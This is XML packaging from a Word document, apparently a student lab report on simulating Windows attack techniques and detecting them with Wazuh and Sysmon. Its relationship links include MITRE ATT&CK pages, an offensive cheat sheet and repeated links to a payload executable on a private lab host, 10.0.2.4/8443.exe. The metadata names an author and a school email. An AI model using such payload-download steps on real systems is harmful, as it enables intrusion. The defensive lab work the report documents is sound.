            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="198322843">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="7738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3774">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2026907250">
          <w:marLeft w:val="375"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="963121673">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="210"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="178085442">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="75"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="3832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915860">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1868717759">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1874534523">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1879126223">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1880242234">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1898740119">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1912890949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1913389517">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1935048370">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1948465931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="56977395">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="205260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9449">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1977686285">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2006855544">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2009407319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2049790631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2058124751">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2065635265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073918718">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2088650379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="386345236">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1250969874">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1273128940">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="19138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782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10.0.2.4/8443.exe" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.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11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comments.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/001/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/004/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mitre-attack.github.io/attack-navigator/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.4/8443.exe" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/003/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.org/project/uploadserver/"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attack.mitre.org/techniques/T1546/003/"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attack.mitre.org/techniques/T1204/002/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documentation.wazuh.com/current/user-manual/capabilities/log-data-collection/how-it-works.html" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon" TargetMode="External"/><Relationship Id="rId62"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emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.4/8443.exe" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.4/8443.exe" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wazuh.com/platform/overview/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheet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3.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanar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nvited_Members xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Invited_Students xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <FolderType xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <CultureName xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Students xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Students>
    <Invited_Teachers xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Teachers xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Teachers>
    <Student_Groups xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Student_Groups>
    <Leaders xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Leaders>
    <Self_Registration_Enabled xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Has_Leaders_Only_SectionGroup xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Templates xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Has_Teacher_Only_SectionGroup xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Member_Groups xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Member_Groups>
    <DefaultSectionNames xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Is_Collaboration_Space_Locked xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <AppVersion xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <TeamsChannelId xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Invited_Leaders xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <NotebookType xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Members xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Members>
    <Owner xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Owner>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04D4DC1533AD47AA4EB046B15B04DA" ma:contentTypeVersion="33" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="170e704616000d6d706961324b301994">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="7a55632c-71a9-4716-adec-04b70b797f1d" xmlns:ns4="ca463da9-763a-4420-9236-b49999be4054" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="db0f141b54c6a3966325935e9c3119cc" ns3:_="" ns4:_="">
    <xsd:import namespace="7a55632c-71a9-4716-adec-04b70b797f1d"/>
    <xsd:import namespace="ca463da9-763a-4420-9236-b49999be405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msChannelId"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MediaServiceAutoTags" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceDateTaken" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceOCR" minOccurs="0"/>
                <xsd:element ref="ns3:Leaders" minOccurs="0"/>
                <xsd:element ref="ns3:Members" minOccurs="0"/>
                <xsd:element ref="ns3:Member_Groups" minOccurs="0"/>
                <xsd:element ref="ns3:Invited_Leaders" minOccurs="0"/>
                <xsd:element ref="ns3:Invited_Members" minOccurs="0"/>
                <xsd:element ref="ns3:Has_Leaders_Only_SectionGroup"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5632c-71a9-4716-adec-04b70b797f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MediaServiceAutoTags" ma:index="29" nillable="true" ma:displayName="MediaServiceAutoTags" ma:internalName="MediaServiceAutoTags" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceDateTaken" ma:index="30" nillable="true" ma:displayName="MediaServiceDateTaken" ma:hidden="true" ma:internalName="MediaServiceDateTaken"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Leaders" ma:index="32"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3"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4"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35" nillable="true" ma:displayName="Invited Leaders" ma:internalName="Invited_Leaders">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Invited_Members" ma:index="36" nillable="true" ma:displayName="Invited Members" ma:internalName="Invited_Members">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Has_Leaders_Only_SectionGroup" ma:index="37" nillable="true" ma:displayName="Has Leaders Only SectionGroup" ma:internalName="Has_Leaders_Only_SectionGroup">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolea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ServiceLocation" ma:index="4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463da9-763a-4420-9236-b49999be405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876FB6-3709-40F3-854F-D7520928AA92}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="7a55632c-71a9-4716-adec-04b70b797f1d"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B6C984CE-17FB-4115-92D3-599A1D9E0D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5632c-71a9-4716-adec-04b70b797f1d"/>
    <ds:schemaRef ds:uri="ca463da9-763a-4420-9236-b49999be40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8B0287-37D4-4F86-836A-0A634F6B2ECE}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3056CDEE-4434-4A28-BAC0-4FBCCA13C8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6473</Words>
  <Characters>36902</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>307</Lines>
  <Paragraphs>86</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>43289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ABDUL KAPOOR ASBAR FIRNAS</cp:lastModifiedBy>
  <cp:revision>976</cp:revision>
  <cp:lastPrinted>2026-02-05T03:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-24T22:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T04:44:00Z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edmund@TP.EDU.SG</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_SetDate">
    <vt:lpwstr>2019-12-10T06:25:35.1484006Z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736b4a31-5e70-43c7-9b17-3880d3a905c8</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edmund@TP.EDU.SG</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_SetDate">
    <vt:lpwstr>2019-12-10T06:25:35.1484006Z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736b4a31-5e70-43c7-9b17-3880d3a905c8</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y fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="ContentTypeId">
    <vt:lpwstr>0x0101002B04D4DC1533AD47AA4EB046B15B04DA</vt:lpwstr>
  </property>
